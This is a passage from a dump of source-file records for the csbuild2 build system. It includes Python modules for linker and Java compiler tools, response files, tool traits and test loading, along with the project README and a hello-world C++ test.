\".winmd\"}\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tMsvcLinker.__init__(self, projectSettings)\n\n\t\t# Enable UWP builds so the base tool setups up the toolchain backend properly.\n\t\tself._enableUwp = True\n\n\tdef _getOutputFiles(self, project):\n\t\toutputFiles = MsvcLinker._getOutputFiles(self, project)\n\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\toutputFiles = set(outputFiles)\n\t\t\toutputFiles.add(\"{}.winmd\".format(os.path.join(project.outputDir, project.outputName)))\n\t\t\toutputFiles = tuple(outputFiles)\n\n\t\treturn outputFiles\n\n\tdef _getUwpArgs(self, project):\n\t\targs = [\n\t\t\t\"/APPCONTAINER\",\n\t\t]\n\t\treturn args\n\n\tdef _getLibraryArgs(self, project):\n\t\t# Static libraries don't require the default libraries to be linked, so only add them when building an application or shared library.\n\t\targs = [] if project.projectType == csbuild.ProjectType.StaticLibrary else [\n\t\t\t\"WindowsApp.lib\",\n\t\t]\n\t\targs.extend(list(self._actualLibraryLocations.values()))\n\t\treturn args\n\n\tdef _getOutputFileArgs(self, project):\n\t\targs = MsvcLinker._getOutputFileArgs(self, project)\n\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\targs.extend([\n\t\t\t\t\"/WINMD\",\n\t\t\t\t\"/WINMDFILE:{}.winmd\".format(os.path.join(project.outputDir, project.outputName))\n\t\t\t])\n\n\t\treturn args\n" }, { "alpha_fraction": 0.7134146094322205, "alphanum_fraction": 0.7167682647705078, "avg_line_length": 30.238094329833984, "blob_id": "4d2f6f27c4e450f80c0b1774c550cc70ebafe9a1", "content_id": "b269df8f753b7779477606c375509380a308c229", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3280, "license_type": "no_license", "max_line_length": 140, "num_lines": 105, "path": "/csbuild/_utils/response_file.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: response_file\n\t:synopsis: Helper class for creating a tool response file.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom . import PlatformBytes\n\nimport os\nimport platform\nimport threading\n\nclass ResponseFile(object):\n\t\"\"\"\n\tResponse file helper class.\n\n\t:param project: Project used with the response file.\n\t:type project: :class:`csbuild._build.project.Project`\n\n\t:param name: Basename of the response file.\n\t:type name: str\n\n\t:param cmd: List of command arguments to write into the response file.\n\t:type cmd: list[str]\n\t\"\"\"\n\t_lock = threading.Lock()\n\n\tdef __init__(self, project, name, cmd):\n\t\tdirPath = os.path.join(project.csbuildDir, \"cmd\", project.outputName, project.toolchainName, project.architectureName, project.targetName)\n\t\tfileMode = 438 # Octal 0666\n\t\tflags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC\n\n\t\t# The O_NOINHERIT constant only exists on Windows, so we can't do this in the pythonic way.\n\t\tif platform.system() == \"Windows\":\n\t\t\tflags |= os.O_NOINHERIT # pylint:disable=no-member\n\n\t\t# Create the output directory.\n\t\tif not os.access(dirPath, os.F_OK):\n\t\t\t# TODO: Investigate ways to handle this in a lock-free manner.\n\t\t\twith ResponseFile._lock: # pylint:disable=not-context-manager\n\t\t\t\tif not os.access(dirPath, os.F_OK):\n\t\t\t\t\tos.makedirs(dirPath)\n\n\t\tself._filePath = os.path.join(dirPath, name)\n\t\tself._commandList = [\n\t\t\t\"\\\"{}\\\"\".format(arg)\n\t\t\t\tif \" \" in arg and \"\\\"\" not in arg\n\t\t\t\t\telse arg\n\t\t\tfor arg in cmd if arg\n\t\t]\n\n\t\tf = os.open(self._filePath, flags, fileMode)\n\n\t\tos.write(f, PlatformBytes(\"\\n\".join([arg.replace(\"\\\\\", r\"\\\\\") for arg in self._commandList])))\n\t\tos.fsync(f)\n\t\tos.close(f)\n\n\t@property\n\tdef filePath(self):\n\t\t\"\"\"\n\t\tGet the path to the response file.\n\t\t:return: Response file path.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._filePath\n\n\t@property\n\tdef commandList(self):\n\t\t\"\"\"\n\t\tGet the original list of list of commands.\n\t\t:return: Original command list.\n\t\t:rtype: list[str]\n\t\t\"\"\"\n\t\treturn self._commandList\n\n\tdef AsString(self):\n\t\t\"\"\"\n\t\tGet the full string of the command arguments.\n\t\t:return: Original command list as string.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn \" \".join(self._commandList)\n" }, { "alpha_fraction": 0.7535627484321594, "alphanum_fraction": 0.7550169825553894, "avg_line_length": 29.517751693725586, "blob_id": "6b870a73bfeed08293b7c7d1a697d1bc4793985c", "content_id": "cc547ac4dea00f63d317190c512c1cd18126005a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10315, "license_type": "no_license", "max_line_length": 99, "num_lines": 338, "path": "/csbuild/tools/common/tool_traits.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tool_traits\n\t:synopsis: Optional add-ins for tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom ... import log\nfrom ...toolchain import Tool\nfrom ..._utils import ordered_set\n\nclass HasDebugLevel(Tool):\n\t\"\"\"\n\tHelper class to add debug level support to a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tclass DebugLevel(object):\n\t\t\"\"\"\n\t\t'enum' representing various levels of debug information\n\t\t\"\"\"\n\t\tDisabled = 0\n\t\tEmbeddedSymbols = 1\n\t\tExternalSymbols = 2\n\t\tExternalSymbolsPlus = 3\n\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._debugLevel = projectSettings.get(\"debugLevel\", HasDebugLevel.DebugLevel.Disabled)\n\n\t@staticmethod\n\tdef SetDebugLevel(debugLevel):\n\t\t\"\"\"\n\t\tSet a project's desired debug level.\n\n\t\t:param debugLevel: Project debug level.\n\t\t:type debugLevel: :class:`csbuild.tools.common.tool_traits.HasDebugLevel.DebugLevel`\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"debugLevel\", debugLevel)\n\n\t@staticmethod\n\tdef SetDebugLevelIfUnset(debugLevel):\n\t\t\"\"\"\n\t\tSet a project's desired debug level. If already set, does nothing.\n\n\t\t:param debugLevel: Project debug level.\n\t\t:type debugLevel: :class:`csbuild.tools.common.tool_traits.HasDebugLevel.DebugLevel`\n\t\t\"\"\"\n\t\tif not csbuild.currentPlan.HasValue(\"debugLevel\"):\n\t\t\tlog.Info(\"Setting default debug level.\")\n\t\t\tcsbuild.currentPlan.SetValue(\"debugLevel\", debugLevel)\n\n\nclass HasOptimizationLevel(Tool):\n\t\"\"\"\n\tHelper class to add optimization level support to a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tclass OptimizationLevel(object):\n\t\t\"\"\"\n\t\t'enum' representing various optimization levels\n\t\t\"\"\"\n\t\tDisabled = 0\n\t\tSize = 1\n\t\tSpeed = 2\n\t\tMax = 3\n\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._optLevel = projectSettings.get(\"optLevel\", HasOptimizationLevel.OptimizationLevel.Disabled)\n\n\t@staticmethod\n\tdef SetOptimizationLevel(optLevel):\n\t\t\"\"\"\n\t\tSet a project's desired optimization level.\n\n\t\t:param optLevel: Project optimization level.\n\t\t:type optLevel: :class:`csbuild.tools.common.has_debug_level.OptimizationLevel`\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"optLevel\", optLevel)\n\n\t@staticmethod\n\tdef SetOptimizationLevelIfUnset(optLevel):\n\t\t\"\"\"\n\t\tSet a project's desired optimization level. If already set, does nothing.\n\n\t\t:param optLevel: Project optimization level.\n\t\t:type optLevel: :class:`csbuild.tools.common.has_debug_level.OptimizationLevel`\n\t\t\"\"\"\n\t\tif not csbuild.currentPlan.HasValue(\"optLevel\"):\n\t\t\tlog.Info(\"Setting default optimization level.\")\n\t\t\tcsbuild.currentPlan.SetValue(\"optLevel\", optLevel)\n\n\nclass HasStaticRuntime(Tool):\n\t\"\"\"\n\tHelper class to add static runtime support to a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._staticRuntime = projectSettings.get(\"staticRuntime\", False)\n\n\t@staticmethod\n\tdef SetStaticRuntime(staticRuntime):\n\t\t\"\"\"\n\t\tSet whether or not a project should use the static runtime library.\n\n\t\t:param staticRuntime: Use the static runtime library.\n\t\t:type staticRuntime: bool\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"staticRuntime\", staticRuntime)\n\n\nclass HasDebugRuntime(Tool):\n\t\"\"\"\n\tHelper class to add debug runtime support to a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._debugRuntime = projectSettings.get(\"debugRuntime\", False)\n\n\t@staticmethod\n\tdef SetDebugRuntime(debugRuntime):\n\t\t\"\"\"\n\t\tSet whether or not a project should use the debug runtime library.\n\n\t\t:param debugRuntime: Use the debug runtime library.\n\t\t:type debugRuntime: bool\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"debugRuntime\", debugRuntime)\n\n\t@staticmethod\n\tdef SetDebugRuntimeIfUnset(debugRuntime):\n\t\t\"\"\"\n\t\tSet whether or not a project should use the debug runtime library. If already set, does nothing.\n\n\t\t:param debugRuntime: Use the debug runtime library.\n\t\t:type debugRuntime: bool\n\t\t\"\"\"\n\t\tif not csbuild.currentPlan.HasValue(\"debugRuntime\"):\n\t\t\tlog.Info(\"Setting default debug runtime setting.\")\n\t\t\tcsbuild.currentPlan.SetValue(\"debugRuntime\", debugRuntime)\n\n\nclass HasIncludeDirectories(Tool):\n\t\"\"\"\n\tHelper class to add C++ include directories.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._includeDirectories = projectSettings.get(\"includeDirectories\", ordered_set.OrderedSet())\n\n\t@staticmethod\n\tdef AddIncludeDirectories(*dirs):\n\t\t\"\"\"\n\t\tAdd directories to search for headers in.\n\n\t\t:param dirs: list of directories\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"includeDirectories\", [os.path.abspath(d) for d in dirs if d])\n\n\tdef GetIncludeDirectories(self):\n\t\t\"\"\"\n\t\tGet the list of include directories.\n\n\t\t:return: include dirs\n\t\t:rtype: ordered_set.OrderedSet[str]\n\t\t\"\"\"\n\t\treturn self._includeDirectories\n\n\tdef SetupForProject(self, project):\n\t\tself._includeDirectories = ordered_set.OrderedSet(self._includeDirectories)\n\n\nclass HasDefines(Tool):\n\t\"\"\"\n\tHelper class to add C++ defines and undefines.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._defines = projectSettings.get(\"defines\", ordered_set.OrderedSet())\n\t\tself._undefines = projectSettings.get(\"undefines\", ordered_set.OrderedSet())\n\n\t@staticmethod\n\tdef AddDefines(*defines):\n\t\t\"\"\"\n\t\tAdd preprocessor defines to the current project.\n\n\t\t:param defines: List of defines.\n\t\t:type defines: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"defines\", defines)\n\n\t@staticmethod\n\tdef AddUndefines(*undefines):\n\t\t\"\"\"\n\t\tAdd preprocessor undefines to the current project.\n\n\t\t:param undefines: List of undefines.\n\t\t:type undefines: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"undefines\", undefines)\n\n\nclass HasCcLanguageStandard(Tool):\n\t\"\"\"\n\tHelper class to set the C language standard to a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._ccStandard = projectSettings.get(\"ccLanguageStandard\", None)\n\n\t@staticmethod\n\tdef SetCcLanguageStandard(standard):\n\t\t\"\"\"\n\t\tSet the C language standard.\n\n\t\t:param standard: C language standard.\n\t\t:type standard: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"ccLanguageStandard\", standard)\n\n\nclass HasCxxLanguageStandard(Tool):\n\t\"\"\"\n\tHelper class to set the C++ language standard to a tool.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._cxxStandard = projectSettings.get(\"cxxLanguageStandard\", None)\n\n\t@staticmethod\n\tdef SetCxxLanguageStandard(standard):\n\t\t\"\"\"\n\t\tSet the C++ language standard.\n\n\t\t:param standard: C++ language standard.\n\t\t:type standard: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"cxxLanguageStandard\", standard)\n\n\nclass HasIncrementalLink(Tool):\n\t\"\"\"\n\tHelper class to enable incremental linking in linker tools that support it.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._incrementalLink = projectSettings.get(\"incrementalLink\", False)\n\n\t@staticmethod\n\tdef SetIncrementalLink(incrementalLink):\n\t\t\"\"\"\n\t\tSet the incremental link property.\n\n\t\t:param incrementalLink: Incremental link toggle\n\t\t:type incrementalLink: bool\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"incrementalLink\", incrementalLink)\n\nclass HasWinRtSupport(Tool):\n\t\"\"\"\n\tHelper class to add support for compiling WinRT projects.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tclass WinRtSupport(object):\n\t\t\"\"\"\n\t\t'enum' representing various levels of WinRT support\n\t\t\"\"\"\n\t\tDisabled = 0\n\t\tEnabled = 1\n\t\tEnabledNoStdLib = 2\n\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\t\tself._winrtSupport = projectSettings.get(\"winrtSupport\", HasWinRtSupport.WinRtSupport.Disabled)\n\n\t@staticmethod\n\tdef SetWinRtSupport(winrtSupport):\n\t\t\"\"\"\n\t\tSet WinRT support.\n\n\t\t:param winrtSupport: Incremental link toggle\n\t\t:type winrtSupport: :class:`csbuild.tools.common.tool_traits.HasWinRtSupport.WinRtSupport`\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"winrtSupport\", winrtSupport)\n" }, { "alpha_fraction": 0.6051668524742126, "alphanum_fraction": 0.6111948490142822, "avg_line_length": 112.31707000732422, "blob_id": "ba540d3d3e63ea5efbc2c0f5a351c315d5cf6c7d", "content_id": "78bc6298776d5165bf0525d76038095b91911c01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4645, "license_type": "no_license", "max_line_length": 613, "num_lines": 41, "path": "/README.md", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "## **Current test status:**\n\n| **Platform** | **Status (develop)** |\n|:-------------|:-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|\n| Linux | [![TeamCity](https://dev.aegresco.com/teamcity/app/rest/builds/buildType:(id:Csbuild_LinuxPython3),branch:(develop)/statusIcon)](https://dev.aegresco.com/teamcity/viewType.html?buildTypeId=Csbuild_LinuxPython3&branch_Csbuild=develop&guest=1) |\n| | |\n| macOS | [![TeamCity](https://dev.aegresco.com/teamcity/app/rest/builds/buildType:(id:Csbuild_MacOSPython3),branch:(develop)/statusIcon)](https://dev.aegresco.com/teamcity/viewType.html?buildTypeId=Csbuild_MacOSPython3&branch_Csbuild=develop&guest=1) |\n| | |\n| Windows | [![TeamCity](https://dev.aegresco.com/teamcity/app/rest/builds/buildType:(id:Csbuild_WindowsPython3),branch:(develop)/statusIcon)](https://dev.aegresco.com/teamcity/viewType.html?buildTypeId=Csbuild_WindowsPython3&branch_Csbuild=develop&guest=1) |\n\n---\n\nCSBuild is a language-agnostic build system focused on maximizing developer iteration time and providing tools for enabling developers to improve their build workflow. Currently, CSBuild is undergoing a complete rewrite to address some core architecture issues with the original iteration. It gets closer every day, but hasn't quite reached feature parity with the original CSBuild.\n\nWhat it currently can do:\n- Build basic C/C++, Java, Objective-C/C++, and Assembly files\n- Build on Windows, macOS, BSD, Linux, Android, Xbox 360, PS3, PS4, PS5, and PSVita systems (language support varies by system)\n- Be extended with tools to work in any language\n- Support macro processing in all strings (i.e., `csbuild.SetOutputDirectory(\"{toolchainName}/{architectureName}/{targetName}\")`)\n- Generate project files for Visual Studio from version 2010 up to 2022.\n- Dependency graph generation by running with --dg (requires the 'graphviz' Python package to be installed)\n \n <img src=\"doc_img/depends.gv.png\" alt=\"Dependency Graph\" style=\"zoom:50%;\" />\n\nWhat's still missing that exists in old CSBuild:\n- \"Chunking\" - intelligently combining multiple translation units into one and breaking them back apart to improve build turn-around\n- Solution generation for QtCreator\n- Build GUI showing the progress of individual files and projects as they're build\n- Build profiler to analyze and identify headers and lines of code that are expensive to compile\n\nThe core architecture is much more stable and maintainable than old CSBuild's, and tools are easier to implement than they were before. The new architecture also successfully decouples csbuild from the c++ language, allowing it to be truly versatile and language-agnostic. The new csbuild also cuts down considerably on wasted time during initial startup. Now that the majority of the core features have been implemented, we expect feature parity for the tools and target platforms supported by old CSBuild to start coming online very quickly, shortly followed by solution generation, chunking, and the gui tools.\n\nDocumentation hasn't been created for the new version of csbuild yet; however, we have created a large suite of tests, so in the short term, a lot of information can be gleaned from looking at the make.py file in each test.\n\nCode for old csbuild, for those interested in it, can be found here: https://github.com/SleepingCatGames/csbuild\n\n---\n\n## Development Notes\n\nCurrently, the only dependency necessary for csbuild development is pylint, but that is only needed for running the pylint test. However, while functional test support is maintained for both Python 2 and Python 3, the pylint test is no longer run for Python 2 because it is no longer supported by pylint and its own dependencies." }, { "alpha_fraction": 0.6260115504264832, "alphanum_fraction": 0.6271676421165466, "avg_line_length": 31.641510009765625, "blob_id": "10e668901d2905b7a055dc514cbca95bbffbdfdc", "content_id": "26f1142c75e4eec6f0b5f0a5e8e5c5d4801bf613", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3460, "license_type": "no_license", "max_line_length": 128, "num_lines": 106, "path": "/csbuild/tools/java_compilers/oracle_java_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: oracle_java_compiler\n\t:synopsis: Oracle-compatible Java compiler tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport platform\nimport os\n\nfrom .java_compiler_base import JavaCompilerBase\n\ndef _ignore(_):\n\tpass\n\nclass OracleJavaCompiler(JavaCompilerBase):\n\t\"\"\"\n\tOracle-compatible Java compiler implementation.\n\t\"\"\"\n\n\tdef __init__(self, projectSettings):\n\t\tJavaCompilerBase.__init__(self, projectSettings)\n\n\t\tself._javaCompilerPath = os.path.join(self._javaBinPath, \"javac{}\".format(\".exe\" if platform.system() == \"Windows\" else \"\"))\n\t\tassert os.access(self._javaCompilerPath, os.X_OK), \"Oracle Java compiler not found at path: {}\".format(self._javaCompilerPath)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project, inputFiles, classRootPath):\n\t\t_ignore(project)\n\t\t_ignore(inputFiles)\n\n\t\toutputFiles = set()\n\n\t\t# Find each .class file in the intermediate directory.\n\t\tfor root, _, files in os.walk(classRootPath):\n\t\t\tfor filePath in files:\n\t\t\t\toutputFiles.add(os.path.join(root, filePath))\n\n\t\treturn tuple(sorted(outputFiles))\n\n\tdef _getCommand(self, project, inputFiles, classRootPath):\n\t\tcmd = [self._javaCompilerPath] \\\n\t\t\t+ self._getClassPathArgs() \\\n\t\t\t+ self._getSourcePathArgs() \\\n\t\t\t+ self._getOutputPathArgs(classRootPath) \\\n\t\t\t+ self._getInputFileArgs(inputFiles)\n\n\t\treturn [arg for arg in cmd if arg]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getClassPathArgs(self):\n\t\tif self._classPaths:\n\t\t\targ = \";\".join(self._classPaths)\n\t\t\treturn [\n\t\t\t\t\"-classpath\",\n\t\t\t\targ,\n\t\t\t]\n\t\treturn []\n\n\tdef _getSourcePathArgs(self):\n\t\tif self._srcPaths:\n\t\t\targ = \";\".join(self._srcPaths)\n\t\t\treturn [\n\t\t\t\t\"-sourcepath\",\n\t\t\t\targ,\n\t\t\t]\n\t\treturn []\n\n\tdef _getOutputPathArgs(self, classRootPath):\n\t\treturn [\n\t\t\t\"-d\",\n\t\t\tclassRootPath,\n\t\t]\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n" }, { "alpha_fraction": 0.757328987121582, "alphanum_fraction": 0.7595005631446838, "avg_line_length": 42.85714340209961, "blob_id": "807801a97aabc1e1c0eb175c787cf8fd633820d6", "content_id": "58898487192a8a113f9bc20bf708be9a4f53ab3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1842, "license_type": "no_license", "max_line_length": 120, "num_lines": 42, "path": "/functional_tests/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: functional_tests\n\t:synopsis: Set of functional tests for csbuild, just contains directories with tests in it\n\t\tThis file only exists to perform test loading.\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\nimport os\nimport imp\n\ndef load_tests(loader, tests, _pattern): #pylint: disable=invalid-name\n\t\"\"\"Load tests\"\"\"\n\n\tfor testdir in os.listdir(\"functional_tests\"):\n\t\tif os.path.isdir(os.path.join(\"functional_tests\", testdir)):\n\t\t\tmodulepath = os.path.abspath(os.path.join(\"functional_tests\", testdir, \"tests.py\"))\n\t\t\tif os.access(modulepath, os.F_OK):\n\t\t\t\ttests.addTests(loader.loadTestsFromModule(imp.load_source(\"functional_tests.{}.tests\".format(testdir), modulepath)))\n\n\treturn tests\n" }, { "alpha_fraction": 0.7358916401863098, "alphanum_fraction": 0.7381489872932434, "avg_line_length": 21.149999618530273, "blob_id": "8f11e6782dd7d54d16574ef9429a739793fd1af5", "content_id": "53745b5bb2725cc2920239291936d43562cfba68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 443, "license_type": "no_license", "max_line_length": 69, "num_lines": 20, "path": "/functional_tests/cpp_features_test/hello_world/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\n#ifdef EXPLICIT_DEFINE\n# define EXPLICIT_DEFINE_MESSAGE \"Explicit define is present\"\n#else\n# define EXPLICIT_DEFINE_MESSAGE \"No explicit define\"\n#endif\n\n#ifdef IMPLICIT_DEFINE\n# define IMPLICIT_DEFINE_MESSAGE \"Implicit define is present\"\n#else\n# define IMPLICIT_DEFINE_MESSAGE \"No implicit define\"\n#endif\n\nint main()\n{\n\tint unused;\n\tprintf(\"%s\", EXPLICIT_DEFINE_MESSAGE \" - \" IMPLICIT_DEFINE_MESSAGE);\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6795483231544495, "alphanum_fraction": 0.6986198425292969, "avg_line_length": 26.67361068725586, "blob_id": "a8d3d7e6e0b62c8551e9852d7b22c44c6704fded", "content_id": "782e262b52b8795110ac8c1589a8945b711fb049", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7970, "license_type": "no_license", "max_line_length": 125, "num_lines": 288, "path": "/csbuild/_utils/ordered_set.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF 